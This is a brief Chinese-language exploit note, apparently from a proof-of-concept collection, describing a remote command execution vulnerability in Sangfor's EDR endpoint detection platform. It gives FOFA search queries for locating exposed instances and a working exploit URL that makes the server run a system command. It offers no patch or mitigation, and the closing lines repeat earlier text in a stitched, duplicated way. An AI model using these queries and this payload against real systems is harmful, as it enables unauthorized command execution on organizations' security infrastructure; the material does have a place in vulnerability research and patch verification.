深信服EDR平台存在远程命令执行漏洞
一、漏洞简介
深信服终端检测响应平台EDR,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。深信服终端监测响应平台(EDR)存在远程命令执行漏洞。
二、影响版本
- 深信服EDR
三、资产测绘
- fofa
app="SANGFOR-EDR"
`title="终端检测响应平台"`
四、漏洞复现
/tool/log/c.php?strip_slashes=system&host=id
深信服终端检测响应平台EDR,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。深信服终端监测响应平台(EDR)存在远程命令执行漏洞。
app="SANGFOR-EDR"
`title="终端检测响应平台"`/tool/log/c.php?strip_slashes=system&host=id